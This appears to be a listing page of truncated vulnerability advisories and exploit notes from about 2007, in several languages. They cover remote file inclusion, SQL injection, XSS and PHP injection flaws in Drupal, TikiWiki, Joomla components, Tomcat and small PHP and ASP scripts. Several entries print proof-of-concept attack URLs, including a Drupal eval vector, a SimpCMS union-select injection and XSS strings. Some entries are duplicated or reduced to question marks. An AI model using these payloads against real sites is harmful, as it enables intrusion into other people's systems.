Phpbasic basicFramework Includes.PHP远程文件包含漏洞

Phpbasic basicFramework是一款基于PHP的WEB应用程序。 Phpbasic basicFramework不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题是由于'includes.php'脚本对用户提交的'root'参数缺少过滤，指定远程服务器上的任意文件作为包含参数，可导致以WEB权限执行任意PHP代码。 phpbasic.com basicFramework 1.0 目前没有详细解决方案提供： http://fw.phpbasic.com/?basic=topic&id=1...

Litespeed Web Server 3.2.3 - Source Code Disclosure

| | |--.-----.| .-----.' |.---.-.----.-----.--| | | | | | -|| -- | -| || | | -| | || |||||/||| |.|||| TheDefaced.org TheDefaced Security Team Presents An 0-day. LiteSpeed Remote Mime Type Injection Discovered by:Tr3mbl3r Shouts to his kitty kats and tacos. Product: LiteSpeed/Discovered in ==3.2.3...

drupal-hash.txt

Drupal = 5.2 PHP Zend Hash Vulnerability Exploitation Vector Example: http://www.example.com/drupal/?menucallbacks1callback=drupaleval&menuitemstype=-1&-312030023=1&q=1/?phpinfo;...

tikiwiki-inject.txt

TikiWiki 1.9.8 Remote PHP Injection Vulnerability Example: http://www.example.com/tikiwiki/tiki-graphformula.php?w=1&h=1&s=1&min=1&max=2&f=x.tan.phpinfo&t=png&title=...

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

No description provided by source. Drupal = 5.2 PHP Zend Hash Vulnerability Exploitation Vector Example: http://www.example.com/drupal/?menucallbacks1callback=drupaleval&menuitemstype=-1&-312030023=1&q=1/?phpinfo;...

Picturesolution 2.1 - config.php?path Remote File Inclusion

Picturesolution 2.1 - config.php?path Remote File Inclusion Picturesolution = v2.1 config.php path Remote File Inclusion Vulnerabilities Found By : Mogatil , http://www.hackteach.org/cc/ Posted By : Cold z3ro , http://www.hackteach.org/cc/ Exploit :...

drbguestbook-xss.txt

Oo Title: DRBGuestbook Remote XSS Vulnerability Download: http://www.hotscripts.com/jump.php?listingid=67702&jumptype=1 Author: Gokhan Contact: [email protected] | KAF KAF KAF SIN SIN SIN KAFSIN KAFSIN KAF Vuln Code: index.php XSS: http://site/guestbook/index.php?action=alert"XSS"; Tum islam...

segue-rfi.txt

?????????? ??????????????? ??????????????????? ??????????????????????? ?????????????????????????? ?????????????????????????????? ????????????????????????????????? ??????????????????????????????????? ????????????????????????????????????? ???????????????????????????????????????...

ohesa-sql.txt

Ohesa Emlak Portalý SQL Injection Vulnerability Software: Ohesa Emlak Portalý download: not free300 $ sale: http://www.aspindir.com/goster/5178 demo: http://www.ohesa.com.tr/web/emlak/www/ Found By: GeFORC3 G3 Example & Exploit: http://www.site.com/scriptpath/satilik.asp?Kategori=SQL...

simpnews24103-xss.txt

netVigilance Security Advisory 70 SimpNews version 2.41.03 Multiple XSS Attack Vulnerabilities Description: SimpNews is a news system written in PHP. Features: Data stored in MySQL, admin interface, support for multiple languages, support for multiple instances in one database, own header, multip...

simpcms-sql.txt

SimpCMS = all Remote SQL Injection Vulnerability Found By : ú Cold z3ro , http://www.hackteach.org/ Script : http://www.simpcms.com/ ==================================== Exploit : /index.php?site=search&keyword=1'//union//select//0,1,2,3,name,5,6//from//categories/ OR /index.php?site=search in...

Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability

No description provided by source. Ajax File Browser 3 Beta Remote File Inclusion found by the "arfis project" http://arfis.wordpress.com/ Project Info: ------------- Name: Ajax File Browser Link: http://sourceforge.net/projects/ajaxfb/ DL:...

Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability

No description provided by source. Ajax File Browser 3 Beta Remote File Inclusion found by the "arfis project" http://arfis.wordpress.com/ Project Info: ------------- Name: Ajax File Browser Link: http://sourceforge.net/projects/ajaxfb/ DL:...

Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability

No description provided by source. Joomla Radio v5 Component RFI Bug in : administrator/components/comjoomlaradiov5/admin.joomlaradiov5.php Variable : $mosConfiglivesite Download : http://www.joomlaos.de/option,comremository/Itemid,41/func,fileinfo/id,2661.html Dork: inurl:"comjoomlaradiov5"...

Joomla! Component Joomlaradio 5.0 - Remote File Inclusion

Joomla Radio v5 Component RFI Bug in : administrator/components/comjoomlaradiov5/admin.joomlaradiov5.php Variable : $mosConfiglivesite Download : http://www.joomlaos.de/option,comremository/Itemid,41/func,fileinfo/id,2661.html Dork: inurl:"comjoomlaradiov5" Example:...

tomcat4131-xss.txt

Apache Tomcat/4.1.31 ships with built in examples. One of the example calendar.jsp suffers from input validation error and could be exploited for cross site scriptingand cross site request forgery. XSS http://myserver:myport/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert"XSS!"%3c%2fscript%3e...

Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability

Apache Tomcat/4.1.31 ships with built in examples. One of the example calendar.jsp suffers from input validation error and could be exploited for cross site scriptingand cross site request forgery. XSS http://myserver:myport/examples/jsp/cal/cal2.jsp?time=8am3cscript3eale rt"XSS!"3c2fscript3e XSR...

PHPNuke-Clan 4.2.0 - mvcw_conver.php Remote File Inclusion

PHPNuke-Clan 4.2.0 - mvcwconver.php Remote File Inclusion '/ -.- --------------------------oOO------OOo------------------------- | PHPNuke-Clan = v4.2.0 mvcwconver.php Remote File Inclusion | | coded by DNX | ------------------------------------------------------------------ ! Discovered: DNX !...

SQL-инъекция в ActiveKB v1.5

Здравствуйте, 3APA3A. Software: ActiveKB v1.5 Vendor: www.interspire.com Vulnerability: множественные SQL-инъекции Risk: средний Date: 27.08.2007 discovered by durito damagelab -duritoatmaildotru- HTTP: durito.narod.ru +:| Details |: SQL-инъекции +:| Экплойт |:...

aspnet-xss.txt

ASP.NET version of Text File Search XSS Vulnerability Software: ASP.NET version of Text File Search download: http://www.aspindir.com/goster/5084 demo: http://aspnet.asp101.com/samples/textfilesearch.aspx Found By: GeFORC3 G3 Example & Exploit : You write xss code in ASP.NET version of Text File...